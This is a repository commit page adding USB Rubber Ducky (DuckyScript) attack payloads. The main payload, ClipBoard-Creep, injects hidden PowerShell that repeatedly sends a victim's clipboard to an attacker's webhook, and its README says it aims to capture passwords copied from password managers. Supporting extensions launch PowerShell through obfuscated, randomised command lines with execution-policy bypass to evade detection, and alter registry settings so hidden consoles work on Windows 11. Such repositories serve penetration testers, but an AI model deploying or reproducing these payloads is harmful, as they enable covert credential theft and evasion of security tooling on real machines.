hak5
/
usbrubberducky-payloads
mirror of https://github.com/hak5/usbrubberducky-payloads.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge pull request #343 from 0iphor13/master 

Uploaded ClipBoard-Creep & Extensions: Detect_Finished; Windows11_Console_Downgrade
pull/375/head
Dallas Winger 2023-07-21 07:38:20 -04:00 committed by GitHub
parent 32f997633c 42fb5a27a2
commit 95aab5627a
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
8 changed files with 294 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

31
payloads/extensions/community/Detect_Finished Normal file
View File

@ -0,0 +1,31 @@
EXTENSION Detect_Finished
REM VERSION 1.0
REM AUTHOR: 0iphor13
REM_BLOCK DOCUMENTATION
USAGE:
Use the function Detect_Finished() to signal the finished execution of your payload.
END_REM
REM CONFIGURATION:
DEFINE #PAUSE 150
FUNCTION Detect_Finished()
IF ($_CAPSLOCK_ON == FALSE)
CAPSLOCK
DELAY #PAUSE
CAPSLOCK
DELAY #PAUSE
CAPSLOCK
DELAY #PAUSE
CAPSLOCK
ATTACKMODE OFF
ELSE IF
CAPSLOCK
DELAY #PAUSE
CAPSLOCK
DELAY #PAUSE
CAPSLOCK
ATTACKMODE OFF
END_IF
END_FUNCTION
END_EXTENSION

35
payloads/extensions/community/Windows11_Console_Downgrade Normal file
View File

@ -0,0 +1,35 @@
EXTENSION Windows11_Console_Downgrade
REM_BLOCK
Version: 1.0
Author: 0iphor13
Description: Downgrade the default command prompt of Windows 11 to use Conhost again.
Afterwards PowerShell can be used with paramters like "-WindowStyle Hidden" again.
END_REM
REM CONFIGURATION:
REM Used to wait until initial execution
DEFINE #INPUT_WAIT 2000
REM GUID for using the legacy console host for terminal execution
DEFINE #CONHOST B23D10C0-E52E-411E-9D5B-C09FDF709C7D
FUNCTION Console_Downgrade()
DELAY #INPUT_WAIT
GUI r
DELAY 500
STRINGLN powershell -NoP -NonI
DELAY 1000
STRING Set-ItemProperty -Path "HKCU:\Console\%%Startup" -Name DelegationConsole -Value "{#CONHOST}";
STRINGLN Set-ItemProperty -Path "HKCU:\Console\%%Startup" -Name DelegationTerminal -Value "{#CONHOST}";exit
END_FUNCTION
REM_BLOCK
EXAMPLE USAGE AFTER EXTENSION: Downgrade the command prompt via registry, then open a hidden PS instance and execute Calc.exe.
Console_Downgrade()
DELAY 2000
GUI r
DELAY 2000
STRINGLN powershell -w h
DELAY 1500
STRINGLN calc.exe;exit
END_REM
END_EXTENSION

0
payloads/extensions/community/windows_elevated_execution → payloads/extensions/community/Windows_Elevated_Execution
View File

17
payloads/library/exfiltration/ClipBoard-Creep/README.md Normal file
View File

@ -0,0 +1,17 @@
# Clipboard-Creep #
Clipboard-Creep is a basic script which tracks the users clipboard and exfiltrates it contents. It was created to get access to passwords copied out of password managers, but might be useful in general.
## Usage ##
### #HOOK ###
Define your webhook under #HOOK
![alt text](https://github.com/0iphor13/usbrubberducky-payloads/blob/master/payloads/library/exfiltration/ClipBoard-Creep/media/hook.png)
### #CALLBACK_DELAY ###
Define a timer under #CALLBACK_DELAY. This defines the pause between calls to your webhook. A default of 12 seconds was choosen to capture potential passwords, in clipboards of password managers.
![alt text](https://github.com/0iphor13/usbrubberducky-payloads/blob/master/payloads/library/exfiltration/ClipBoard-Creep/media/callback.png)
After successful execution you'll see the contents of your targets clipboard or simply signs of life flying into your webhook.
![alt text](https://github.com/0iphor13/usbrubberducky-payloads/blob/master/payloads/library/exfiltration/ClipBoard-Creep/media/clippy.png)

BIN
payloads/library/exfiltration/ClipBoard-Creep/media/callback.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 38 KiB

BIN
payloads/library/exfiltration/ClipBoard-Creep/media/clippy.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 36 KiB

BIN
payloads/library/exfiltration/ClipBoard-Creep/media/hook.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 39 KiB

211
payloads/library/exfiltration/ClipBoard-Creep/payload.txt Normal file
View File

@ -0,0 +1,211 @@
REM Clipboard-Creep
REM Version 1.0
REM OS: Windows
REM Author: 0iphor13
REM Requirement: DuckyScript 3.0, PayloadStudio v.1.3 minimum
REM This payload aims on the targets clipboard. Define a webhook plug in your payload and observe the clipboard content on your catching server.
REM Based on Clipboard-Creep.ps1 - https://github.com/0iphor13/ClipBoard-Creep
EXTENSION PASSIVE_WINDOWS_DETECT
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
Windows fully passive OS Detection and passive Detect Ready
Includes its own passive detect ready.
Does not require additional extensions.
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
$_OS will be set to WINDOWS or NOT_WINDOWS
See end of payload for usage within payload
END_REM
REM CONFIGURATION:
DEFINE #MAX_WAIT 150
DEFINE #CHECK_INTERVAL 20
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
DEFINE #NOT_WINDOWS 7
$_OS = #NOT_WINDOWS
VAR $MAX_TRIES = #MAX_WAIT
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
DELAY #CHECK_INTERVAL
$MAX_TRIES = ($MAX_TRIES - 1)
END_WHILE
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
$_OS = WINDOWS
END_IF
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
IF ($_OS == WINDOWS) THEN
STRING HELLO WINDOWS!
ELSE
STRING HELLO WORLD!
END_IF
END_REM
END_EXTENSION
EXTENSION EXTENSION Rolling_Powershell_Execution
REM VERSION 1.0
REM Author: 0iphor13
REM Credits: Korben, Daniel Bohannon, Grzegorz Tworek
REM Requirements: PayloadStudio v.1.3 minimum
REM Starts Powershell in uncommon ways to avoid basic detection
REM Via randomisation, obfuscation and usage of less used parameters, this extension helps to evade basic detection.
REM CONFIGURATION:
REM Add ExecutionPolicy bypass
DEFINE #EXECUTIONPOLICY FALSE
DEFINE #DELAY 500
$_RANDOM_MIN = 1
$_RANDOM_MAX = 16
VAR $RANDOM_PS = $_RANDOM_INT
FUNCTION Rolling_Powershell_Execution()
IF ($RANDOM_PS == 1) THEN
STRING cmd.exe /c "p%PSModulePath:~21,1%weRshe%PUBLIC:~12,1%l.exe -noPr -Noni -wi Hid"
ELSE IF ($RANDOM_PS == 2) THEN
STRING cmd.exe /c "PowerShe%PUBLIC:~12,1%%PUBLIC:~12,1% /NoPr /NonI /w hi"
ELSE IF ($RANDOM_PS == 3) THEN
STRING cmd.exe /c "P%PSModulePath:~21,1%werShell /NoPr /NonI /w hi"
ELSE IF ($RANDOM_PS == 4) THEN
STRING cmd /c "FOR /F "delims=s\ t%PSModulePath:~25,1%kens=4" %a IN ('set^|findstr PSM')DO %a -nop -noni /w H"
ELSE IF ($RANDOM_PS == 5) THEN
STRING cmd /c "Powe%ALLUSERSPROFILE:~4,1%Shell -NoPr -NonI -w hi"
ELSE IF ($RANDOM_PS == 6) THEN
STRING cmd /c "p^Owe%ALLUSERSPROFILE:~7,1%Shell /NoPr /Nonin /wind hidD"
ELSE IF ($RANDOM_PS == 7) THEN
STRING cmd.exe /c "P%PSModulePath:~21,1%werShell -NoPr -NonI -w hi"
ELSE IF ($RANDOM_PS == 8) THEN
STRING powershell -NoPro -noninT -win h
ELSE IF ($RANDOM_PS == 9) THEN
STRING cmd /c "p^Owe%ALLUSERSPROFILE:~7,1%Shell -NoP -Noni -wind hidD"
ELSE IF ($RANDOM_PS == 2) THEN
STRING powershell.exe -NoP -nOni -W h
ELSE IF ($RANDOM_PS == 10) THEN
STRING cmd /c "FOR /F "delims=s\ tokens=4" %a IN ('set^|findstr PSM')DO %a -nop -noni -w H"
ELSE IF ($RANDOM_PS == 11) THEN
STRING powershell -nopr -noninT -W HiddEn
ELSE IF ($RANDOM_PS == 12) THEN
STRING cmd.exe /c "FOR /F "delims=s\ tokens=4" %a IN ('set^|findstr PSM')DO %a -noProF -nonin -win Hi"
ELSE IF ($RANDOM_PS == 13) THEN
STRING cmd /c "P%PSModulePath:~25,1%weRShell -noProf -NonIn -wi h"
ELSE IF ($RANDOM_PS == 14) THEN
STRING powershell -noproF -noni -W Hi
ELSE IF ($RANDOM_PS == 15) THEN
STRING cmd /c "Powe%ALLUSERSPROFILE:~4,1%Shell /NoPr /NonI /%PSModulePath:~17,1% hi"
ELSE ($RANDOM_PS == 16) THEN
STRING powershell.exe -noP -nOnI -windo H
END_IF
IF_DEFINED_TRUE #EXECUTIONPOLICY
SPACE
IF (($RANDOM_PS % 2) == 0) THEN
STRING -ep ByPasS
ELSE IF (($RANDOM_PS % 5) == 0) THEN
STRING -exec bypass
ELSE IF (($RANDOM_PS % 7) == 0) THEN
STRING -exeC byPasS
ELSE IF (($RANDOM_PS % 10) == 0) THEN
STRING -exEcUtionPoL bYpaSs
ELSE IF (($RANDOM_PS % 12) == 0) THEN
STRING -exEcUtion bYPaSs
ELSE
STRING -eP BYPaSs
END_IF
END_IF_DEFINED
ENTER
DELAY #DELAY
END_FUNCTION
REM EXAMPLE USAGE AFTER EXTENSION
REM DELAY 2000
REM GUI r
REM DELAY 2000
REM Rolling_Powershell_Execution()
END_EXTENSION
EXTENSION Detect_Finished
REM VERSION 1.0
REM AUTHOR: 0iphor13
REM_BLOCK DOCUMENTATION
USAGE:
Use the function Detect_Finished() to signal the finished execution of your payload.
END_REM
REM CONFIGURATION:
DEFINE #PAUSE 150
FUNCTION Detect_Finished()
IF ($_CAPSLOCK_ON == FALSE)
CAPSLOCK
DELAY #PAUSE
CAPSLOCK
DELAY #PAUSE
CAPSLOCK
DELAY #PAUSE
CAPSLOCK
ATTACKMODE OFF
ELSE IF
CAPSLOCK
DELAY #PAUSE
CAPSLOCK
DELAY #PAUSE
CAPSLOCK
ATTACKMODE OFF
END_IF
END_FUNCTION
END_EXTENSION
REM Define URL of your catching webhook
DEFINE #HOOK "https://example.com/"
REM Define the pause between calls to your webhook.
DEFINE #CALLBACK_DELAY 12
IF ($_OS == WINDOWS) THEN
GUI r
DELAY 1000
REM randomized and obfuscated way to start powershell
Rolling_Powershell_Execution()
STRINGLN_POWERSHELL
$e = $null
while ($true)
{
$c = Get-Clipboard
if ($c)
{
if ($c -ne $e)
{
$o = "Clipboard content: $c"
irm -Uri #HOOK -Method POST -Body $o
} else
{
$o = "Clipboard content hasn't changed"
irm -Uri #HOOK -Method POST -Body $o
}
$e = $c
} else
{
$o = "Clipboard is empty"
irm -Uri #HOOK -Method POST -Body $o
}
sleep -s #CALLBACK_DELAY
}
END_STRINGLN
ENTER
DELAY 250
Detect_Finished()
ELSE
ATTACKMODE OFF
END_IF